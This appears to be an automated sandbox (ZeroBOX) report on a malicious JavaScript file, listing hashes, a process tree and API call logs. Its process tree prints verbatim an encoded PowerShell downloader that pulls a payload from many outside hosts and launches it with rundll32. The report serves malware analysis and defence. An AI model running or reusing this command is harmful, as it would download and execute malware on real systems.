Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	May 23, 2023, 9:37 a.m.	May 23, 2023, 9:39 a.m.

Size	122.6KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`c2639b1131697d67a1a76458bcfdf901`
SHA256	`cae9ff6daaf74a556bbab34782745441f643fb0b2fcf74e18f738588572dfacf`
CRC32	`BC3FAFB2`
ssdeep	`3072:TwH8YyBOLs811SLsVloqMoTVolEiG5gxE4vaRKVK:TwH8YyBZU1SLsVl5V4tK`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Clji.js
3052
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\submatrixPunditries.js" UnderfleeceDeathsman Dentale
  2312
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABtAG8AYQBiAGkAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBRAEEAdQBBAEQARQBBAE0AQQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABjAEEATABnAEEAMABBAEQATQBBAE8AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAE0AQQBOAGcAQQB1AEEARABJAEEATgBBAEEAeQBBAEMANABBAE0AUQBBADAAQQBEAFUAQQBMAGcAQQB5AEEARABFAEEATQBRAEEAPQAiADsAJABjAGgAbwBsAG8AaQBkAGkAbgBpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADQAQQBEAFEAQQBMAGcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBNAFEAQQA0AEEAQQA9AD0AZQBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AQQBBADAAQQBDADQAQQBPAEEAQQB3AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHgAQQBEAGcAQQBOAGcAQQA9AGUASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBOAEEAQQB1AEEARABJAEEATgBBAEEANQBBAEMANABBAE0AUQBBAHoAQQBEAFUAQQBMAGcAQQA1AEEARABVAEEAZQBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AQQBBADUAQQBDADQAQQBPAEEAQQA0AEEAQwA0AEEATQBRAEEANABBAEQARQBBAEwAZwBBADMAQQBEAFUAQQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAxADsAJABwAGUAYwBrAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBRAEEAYwBnAEIAaABBAEgAYwBBAFkAZwBCAGwAQQBHADQAQQBZAHcAQgBvAEEARQBZAEEAYwBnAEIAaABBAEgAawBBAGEAUQBCAHUAQQBHAGMAQQBMAGcAQgB0AEEASABVAEEARgA9AE0ARwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE0AZwBBAHoAQQBEAFkAQQBMAGcAQQB5AEEARABNAEEATgBBAEEAPQBGAD0ATQBHAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AdwBBADUAQQBDADQAQQBNAFEAQQAyAEEARABBAEEATABnAEEAeABBAEQAUQBBAE4AZwBBAHUAQQBEAEUAQQBNAHcAQQA1AEEAQQA9AD0AIgA7ACQAcgBvAG0AYQBuAGkAegBlAHIAQQBzAHAAcgBlAGQAaQBuAGkAZABhAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBHAHcAQQBaAFEAQgAxAEEASABJAEEAYgB3AEIAMABBAEcAOABBAGIAUQBCADUAQQBGAFkAQQBkAFEAQgBzAEEARwBNAEEAWQBRAEIAdQBBAEcAawBBAGMAdwBCAGwAQQBHAFEAQQBMAGcAQgB1AEEARwB3AEEAIgA7ACQASQBuAGMAbwBtAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUARQBBAFkAdwBCADAAQQBIAFUAQQBiAHcAQgB6AEEARwBVAEEATABnAEIAbABBAEcARQBBAGMAZwBCADAAQQBHAGcAQQBzAEUAYgBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABnAEEATABnAEEANQBBAEQAZwBBAEwAZwBBADMAQQBEAEkAQQAiADsAJABoAGkAcABwAHUAcgBpAHMARQB4AGMAdQBzAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEAUgBBAEIAMABBAEgATQBBAFYAQQBBADQAQQBIAGcAQQBkAEEAQQA9AGQAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATgB3AEEANQBBAEMAOABBAFUAQQBCAHMAQQBFAHcAQQBOAEEAQgB0AEEARgBVAEEATAB3AEEAdwBBAEUAMABBAFkAZwBBAHcAQQBGAGcAQQBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAYwBBAE4AZwBBAHUAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATQBRAEEANQBBAEQAZwBBAEwAZwBBAHkAQQBEAEUAQQBNAHcAQQB2AEEARQBZAEEAYwB3AEEANABBAEYAQQBBAGUAUQBBAHYAQQBGAEkAQQBaAFEAQgA1AEEARABBAEEAUgB3AEIAaABBAEYATQBBAFcAZwBBADIAQQBGAE0AQQBWAEEAQgB5AEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAaABhAGsAYQBmAG8AdABoAEwAbwBwAHAAZQByACAAaQBuACAAJABoAGkAcABwAHUAcgBpAHMARQB4AGMAdQBzAGUAcgBzACAALQBzAHAAbABpAHQAIAAiAGQAIgApACAAewAkAFAAbABhAG4AbwByAGIAbwBpAGQAUwB0AHIAeQBwAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQBBAEEAegBBAEMANABBAE0AUQBBADUAQQBEAFkAQQBMAGcAQQB4AEEARABFAEEATgBBAEEAPQBuAGoAbwBVAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAWQBBAEwAZwBBADQAQQBEAEEAQQBMAGcAQQB5AEEARABNAEEATQBRAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBBAD0APQBuAGoAbwBVAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE0AUQBBAHUAQQBEAGMAQQBOAFEAQQB1AEEARABJAEEATQBnAEEAegBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBuAGoAbwBVAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQAyAEEARABZAEEATABnAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAEEAQQBOAGcAQQA9ACIAOwB0AHIAeQAgAHsAJABpAG4AYwBhAHIAYwBlAHIAYQB0AGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATQBRAEEANABBAEQARQBBAEwAZwBBAHgAQQBEAEUAQQBOAFEAQQA9AHQAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAGcAQQA0AEEAQwA0AEEATQBnAEEAdwBBAEQAUQBBAEwAZwBBADMAQQBEAGsAQQBMAGcAQQB4AEEARABRAEEATQBRAEEAPQAiADsAJABVAG4AZABpAHYAZQByAHQAaQBiAGwAeQBGAGkAYgByAG8AdgBhAHMAYwB1AGwAYQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABNAEEATQBnAEEAdQBBAEQARQBBAE8AQQBBADQAQQBDADQAQQBNAFEAQQB5AEEARABFAEEATABnAEEAeABBAEQAawBBAE4AdwBBAD0ARQB1AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQATQBBAEwAZwBBAHgAQQBEAFkAQQBPAEEAQQB1AEEARABrAEEATQBBAEEAdQBBAEQAVQBBAE8AQQBBAD0ARQB1AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEgAWQBBAFoAUQBCAHkAQQBHAGsAQQBiAGcAQgB6AEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGIAZwBCAGoAQQBHAGsAQQBaAFEAQgB6AEEARQAwAEEAZABRAEIAeQBBAEgAQQBBAGEAQQBCADUAQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAYgBBAEIAdgBBAEcARQBBAGIAZwBBAD0ARQB1AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHcAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAMwBBAEQAYwBBAEwAZwBBADAAQQBEAFUAQQAiADsAJABDAHIAYQBjAGsAdQBwACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAYQBRAEIAagBBAEcAcwBBAFoAUQBCADAAQQBIAE0AQQBRAFEAQgBpAEEARwBJAEEAYgB3AEIANgBBAEgAbwBBAGIAdwBBAHUAQQBIAGsAQQBiAHcAQgBuAEEARwBFAEEAaABhAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGQAUQBCAHoAQQBIAEEAQQBhAFEAQgBrAEEAQwA0AEEAYwBBAEIAaABBAEgASQBBAGQAQQBCADUAQQBBAD0APQBoAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBvAEEASABrAEEAYwBBAEIAdgBBAEgAUQBBAGMAZwBCAHYAQQBIAEEAQQBhAEEAQgBwAEEARwBNAEEATABnAEIAbgBBAEgASQBBAGIAdwBCADEAQQBIAEEAQQAiADsAJABQAGkAZQByAGkAZABHAGUAbgB1AGYAbABlAHgAaQBvAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaABhAGsAYQBmAG8AdABoAEwAbwBwAHAAZQByACkAKQA7AHcAZwBlAHQAIAAkAFAAaQBlAHIAaQBkAEcAZQBuAHUAZgBsAGUAeABpAG8AbgAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABuAG8AbgBpAG4AdABlAGwAbABpAGcAZQBuAGMAZQAuAE4AbwBuAGEAYwBpAGQAOwAkAEUAcwBjAG8AcABlAHQAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEcAVQBBAGIAQQBCAGgAQQBHADQAQQBiAHcAQgB3AEEARwB3AEEAWQBRAEIAcgBBAEcAawBBAFkAUQBCAEUAQQBHAGsAQQBjAHcAQgBwAEEARwA0AEEAZABBAEIAbABBAEcAYwBBAGMAZwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAYQBRAEIAegBBAEgAUQBBAEwAZwBCAGgAQQBHAGMAQQBaAFEAQgB1AEEARwBNAEEAZQBRAEEAPQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAZwBBAGEAUQBCAHkAQQBIAFUAQQBiAGcAQgBrAEEARwA4AEEAUQB3AEIAdgBBAEcAOABBAGMAQQBCAGwAQQBIAEkAQQBlAFEAQQB1AEEARwA0AEEAWQBRAEIAbgBBAEcAOABBAGUAUQBCAGgAQQBBAD0APQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYATQBBAGQAUQBCAHcAQQBHAFUAQQBjAGcAQgBwAEEARwA0AEEAWgBBAEIAcABBAEgAWQBBAGEAUQBCAGsAQQBIAFUAQQBZAFEAQgBzAEEAQwA0AEEAYgBBAEIAcABBAEcAMABBAGIAdwBBAD0AIgA7ACQAUAByAG8AbABpAGYAZQByAGEAdABpAHYAZQBQAGEAcgBmAGUAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBADMAQQBDADQAQQBOAEEAQQB4AEEAQwA0AEEATgBBAEEAMwBBAEMANABBAE0AUQBBADIAQQBEAEkAQQBBAGoAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AQQBBAHkAQQBDADQAQQBNAGcAQQB4AEEARABrAEEATABnAEEAeABBAEQAUQBBAE8AQQBBAHUAQQBEAEkAQQBOAEEAQQB4AEEAQQA9AD0AQQBqAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBNAEEAQQB1AEEARABFAEEATQBnAEEAeQBBAEMANABBAE4AZwBBADUAQQBDADQAQQBOAGcAQQAwAEEAQQA9AD0AQQBqAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAG8AQQBIAFUAQQBjAHcAQgByAEEARwBrAEEAWgBRAEIAegBBAEUAVQBBAGUAUQBCAGwAQQBHAEkAQQBiAEEAQgBwAEEARwA0AEEAYQB3AEEAdQBBAEcAdwBBAGEAUQBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbgBvAG4AaQBuAHQAZQBsAGwAaQBnAGUAbgBjAGUALgBOAG8AbgBhAGMAaQBkACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgAyADIANQAzADMAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHADQAQQBiAHcAQgB1AEEARwBrAEEAYgBnAEIAMABBAEcAVQBBAGIAQQBCAHMAQQBHAGsAQQBaAHcAQgBsAEEARwA0AEEAWQB3AEIAbABBAEMANABBAFQAZwBCAHYAQQBHADQAQQBZAFEAQgBqAEEARwBrAEEAWgBBAEEAcwBBAEgAWQBBAGEAUQBCAHcAQQBIAE0AQQBPAHcAQgB6AEEARwB3AEEAWQBRAEIAagBBAEcAcwBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQA9ACIAOwAkAG8AdQB0AGYAaQB0AHQAZQByAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBNAEEAQQB1AEEARABFAEEATgBBAEEANABBAEMANABBAE4AQQBBADQAQQBDADQAQQBPAFEAQQB3AEEAQQA9AD0AIgA7ACQAYwBhAG0AZQByAGEAbABpAHMAdABpAGMASAB5AGQAcgBvAGMAeQBhAG4AaQBkAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBOAHcAQQB1AEEARABJAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBEAE0AQQBMAGcAQQA0AEEARABZAEEAIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABjAHUAbgBjAHQAYQB0AGkAbwBuAEYAdQByAHIAaQBuAGcAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE4AQQBBAHUAQQBEAEkAQQBNAEEAQQA0AEEAQwA0AEEATQBRAEEAeABBAEQATQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQA9ACIAOwAkAE4AaQB0AHIAbwBwAGEAcgBhAGYAZgBpAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBZAFEAQgB6AEEASABRAEEAWgBRAEIAawBBAEMANABBAGIAUQBCAGgAQQBHADQAQQBZAFEAQgBuAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAD0AIgA7ACQAYQBuAHQAaQBjAGEAbgBjAGUAcgBvAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AUQBBADEAQQBDADQAQQBNAFEAQQA1AEEARABBAEEATABnAEEANQBBAEQARQBBAEwAZwBBADUAQQBEAFEAQQB2AEIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAYgB3AEIAegBBAEcAMABBAGIAdwBCAHkAQQBHAFUAQQBMAGcAQgAzAEEARwBrAEEAWgBRAEIAdQBBAEEAPQA9AHYAQgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAHcAQQBhAFEAQgBuAEEASABVAEEAYgBBAEIAaABBAEgASQBBAEwAZwBCAGgAQQBIAEkAQQBZAHcAQgBvAEEARwBrAEEAdgBCAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdgBBAEcASQBBAGQAQQBCADEAQQBIAE0AQQBhAFEAQgBtAEEARwA4AEEAYgBBAEIAcABBAEcAOABBAGQAUQBCAHoAQQBDADQAQQBZAGcAQgBwAEEARwBzAEEAWgBRAEEAPQAiADsAfQB9ACQAbwB4AGYAbwByAGQAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAFEAQQBhAFEAQgB6AEEASABBAEEAWgBRAEIAdQBBAEgATQBBAFkAUQBCADAAQQBHAGsAQQBiAHcAQgB1AEEARwBFAEEAYgBBAEEAdQBBAEcASQBBAGQAUQBCAHoAQQBHAGsAQQBiAGcAQgBsAEEASABNAEEAYwB3AEEAPQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCAHkAQQBIAFUAQQBiAFEAQgB3AEEARwBVAEEAZABBAEEAdQBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBlAFEAQQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABRAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAFEAQQBOAGcAQQB1AEEARABJAEEATQB3AEEAdwBBAEEAPQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBuAEEASABVAEEAWQBRAEIAdQBBAEgAawBBAGIAQQBCAEMAQQBHAHcAQQBiAHcAQgB2AEEARwBRAEEAZQBRAEEAdQBBAEcAYwBBAGQAUQBCAHAAQQBHAFEAQQBaAFEAQQA9ACIAOwAkAGwAZQBlAHIAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAHcAQQB4AEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBAHkAQQBEAEUAQQBOAFEAQQB1AEEARABjAEEATgBRAEEAPQBYAFIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABZAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAeABBAEQAawBBAE0AdwBBAD0AWABSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAZwBBAE0AUQBBAHUAQQBEAEUAQQBPAEEAQQA1AEEAQwA0AEEATQBRAEEAMgBBAEQAYwBBAEwAZwBBAHkAQQBEAEEAQQBPAEEAQQA9ACIAOwA="
    2492

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 23, 2023, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2023, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2023, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2023, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 23, 2023, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2023, 9:37 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 23, 2023, 9:37 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042bd68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c268 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c6a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c6a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c6a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c2a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c2a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c2a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c568 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c2a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c2a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c2a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c2a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c2a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c2a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c2a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0042c328 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
